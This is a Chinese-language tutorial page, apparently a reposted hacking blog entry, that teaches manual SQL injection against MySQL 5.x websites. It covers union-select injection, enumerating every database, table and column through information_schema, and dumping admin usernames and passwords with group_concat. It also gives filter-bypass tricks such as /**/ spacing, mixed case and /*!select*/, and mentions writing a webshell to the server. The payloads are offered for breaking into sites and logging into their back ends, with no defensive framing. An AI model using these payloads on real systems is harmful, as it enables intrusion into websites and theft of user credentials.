当前位置:首页 >> 网络安全 >> 安全知识 >> 内容

MySQL数据库5.X版本基本手工注入总结

时间:2013/4/19 12:09:00 作者:徐汉涛 来源:www.xuhantao.com 浏览:

 根据我对MySQL的认识,注入时,基本可以通过爆、盲注、报错三种方式获得用户名和密码,在权限足够的情况下,还可以直接通过SQL语句插入并导出我们的一句话webshell。

当拿到一个MySQL的注入点的时候,我们需要判断MySQL的版本。因为当MySQL的版本小于4.0时,是不支持union select联合查询的;当MySQL版本大于5.0时,有个默认数据库information_schema,里面存放着所有数据库的信息(比如表名、列名、对应权限等),通过这个数据库,我们就可以跨库查询,爆表爆列。现在一般情况下,MySQL都是4.0以上的,所以我们就放心的用联合查询吧。
 
对于MySQL的注入,大概有这些思路:
1.判断注入点是否有读写权限,如果有,那么可以直接读取配置文件、用户名密码等;当magic_quotes_gpc为off的时候还可以直接导出一句话webshell。
//magic_quotes_gpc为on的时候,'会被转成\',而写导出的绝对路径的时候又必须是用'括起来,所以,就蛋疼了。。
2.没有读写权限时,判断MySQL版本,5.0以上时可以通过爆的方式获得用户名密码;5.0以下或者5.0以上不能爆时(比如限制了information_schema数据库),可以通过盲注获得用户名密码。
//盲注:我的理解是,通过返回页面的正确与否判断查询语句是否正确,和Access数据库的注入很类似,可以算是猜吧。
3.有时候,由于一个参数可能执行了多个查询语句,而导致查不出字段数,更没有数字回显时,如果服务器开启了MySQL错误回显的话,还可以通过报错注入从报错信息中获取我们想要知道的东西。
暂时我想起来的就这些,盲注和报错这两种方式俺不是太熟,就不说了。在这里,我就只简单介绍下MySQL数据库5.X版本的爆表爆列爆内容。
 
 
步骤一:判断注入点
不多说了。单引号、and 1=1、and 1=2。
 
 
步骤二:order by和union select
通过order by查出字段数目N,然后联合查询。
and1=2 union select 1,2,3,4...,N--
//首先and 1=2报错,用单引号或在参数前加个"-"也行
//这里和Access不同,后面可以不加"from 表名";最后面的"--"是注释符,注释掉后面的语句,防止出错,换成"/*"也行,也可以不加
//Access不支持注释符,MySQL和MSSQL支持
//这两个也不多说了
 
 
步骤三:查出基本信息
得到数字回显后,将对应数字位换成我们想查询的信息,比如显示位是3
and1=2 union select 1,2,version(),4...,N--
//介绍几个常用函数:
1. version()——MySQL版本
2. user()——用户名
3. database()——数据库名
4. @@datadir——数据库路径
5. @@version_compile_os——操作系统版本
我们可以通过将对应函数放到显示位中查出相应信息
//再介绍几个很有用的函数:
1. concat(str1,str2,...)——没有分隔符地连接字符串
2. concat_ws(separator,str1,str2,...)——含有分隔符地连接字符串
3. group_concat(str1,str2,...)——连接一个组的所有字符串,并以逗号分隔每一条数据
说着比较抽象,其实也并不需要详细了解,知道这三个函数能一次性查出所有信息就行了。
比如:concat(version(),0x3a,user(),0x3a,database(),0x3a,@@datadir,0x3a,@@verion_compile_os)
concat_ws(0x3a,version(),user(),database(),@@datadir,@@verion_compile_os)
group_concat(version(),0x3a,user(),0x3a,database(),0x3a,@@datadir,0x3a,@@verion_compile_os)
//0x3a是":"的十六进制,在这里把它作为分隔符,没有它,查出来的东西就连成一片了
//在实际查的时候,有些时候可能会出错,比如@@verion_compile_os这个函数就经常出错,去掉就是了。。= =
//对于MySQL函数可以百度,或查看MySQL官方手册
 
 
步骤四:爆表爆列爆用户名密码
爆的方法有很多,我就说说我知道的几种吧,从最“温和的”到最“野蛮的”。
 
第一种:查表查列
1. and 1=2 union select 1,2,table_name,4 from (select * from information_schema.tables where table_schema=库名十六进制 limit N,1)t limit 1--
 2. and 1=2 union select 1,2,column_name,4 from (select * from information_schema.columns where table_name=表名十六进制 and table_schema=库名十六进制 limit N,1)t limit 1--
 3. and 1=2 union select 1,2,列名,4 from 表名
 
//这里改变N的值,查出一个个表名、列名
//这个方法比较老,具体的原理那些我也不太懂,尤其是那个t和后面那个limit 1,了解下就行了
 
第二种:高级查表查列
1. and 1=2 union select 1,2,schema_name,4 from information_schema.schemata limit N,1
 2. and 1=2 union select 1,2,table_name,4 from information_schema.tables where table_schema=要查的库名的十六进制 limit N,1
 3. and 1=2 union select 1,2,column_name,4 from information_schema.columns where table_name=要查的表名的十六进制 limit N,1
 
//有个提速技巧,要查的库名的十六进制那个地方填database(),就是table_schema=database(),直接就表示当前数据库
//找敏感的表,含有admin、manage或user之类的
 
第三种:爆表爆列
1. and 1=2 union select 1,2,group_concat(schema_name),4 from information_schema.schemata
2. and 1=2 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=要爆的库名的十六进制
3. and 1=2 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=要爆的表名的十六进制
4. and 1=2 union select 1,2,group_concat(列名1,0x3a,列名2),4 from 表名

//distinct表示不同,也就是去掉爆出内容的重复部分,不加也可以,我习惯加上
//这个方法好就好在通过用group_concat()这个函数直接爆出所有库名、表名、列名、字段内容,可以提高速度,方便查找
 
第四种:高级爆表爆列
1. and 1=2 union select 1,2,group_concat(distinct table_schema),4 from information_schema.columns
2. and 1=2 union select 1,2,group_concat(distinct table_name),4 from information_schema.columns where table_schema=要爆的库名的十六进制
 3. and 1=2 union select 1,2,group_concat(distinct column_name),4 from information_schema.columns where table_name=要爆的表名的十六进制
 4. and 1=2 union select 1,2,group_concat(列名1,0x3a,列名2),4 from 表名
 
//所有数据都是从information_schema.columns这个表里获取,因为从information_schema这个库的介绍()我们可以看到,从information_schema.columns这个表里,我们可以查到所有的信息,因为它在里面,www.xuhantao.com,table_schema、table_name、column_name这个三个列都有,所以我们可以直接通过这个表,查出我们需要的所有信息,就省了换表这一步了,进一步提升速度
 
到这一步,我们的注入就算完成了,找后台解密登陆就是了。俺再多说几句。
还是那句话,MySQL的注入非常的灵活,我总结的只是最基本的语句,只是一点点皮毛而已。至于更高级的,大家去论坛、百度找找吧。比如当我们用上面的语句无法成功查出的时候,我们可以尝试下这些方法。
1. 当union select 1,2,3,4没有出现数字位时,可以尝试把数字都换成null,然后逐个尝试替换成数字或字符或直接换成version(),找到可以显示出来的那一位。这个貌似是因为对应变量类型不同的原因,我也不是太懂。
2. 有些时候莫名其妙的就出错的时候(比如有数字显示位,而用替换函数(比如version())去替换时却返回空白页或报错),爆不出来的时候,可以尝试通过hex()或convert()等函数来解决可能的编码问题,比如hex(version())、unhex(hex(version()))、convert(version() using latin1)等等
3. 在注入的时候,可以把空格换成"+"或者"/**/",这都是等价的,因为空格会被自动转成"%20",看着很乱,而且换过以后貌似能过一些过滤。
4. 另外,在遇到网站有过滤的时候,可以考虑下大小写变换绕过。所以经常看到大牛们的注入语句是稀奇古怪、变幻莫测。。最近又看到一个变态的绕过方法,/*!select*/,把容易被过滤的东西放到/*!XXX*/中,一样可以正常查询,也就是/*!select*/=select。如果你还不放心那就这样/*!sEleCt*/。这个/*!XXX*/=XXX的原理我还不懂,涛涛电脑知识网,希望大牛能给解释下啊,求教~
 
PS:以后就用最后一种方法就是了,前三种仅做了解。

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 涛涛知识分享网(www.xuhantao.com) © 2019 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 备案号:蒙ICP备15000590号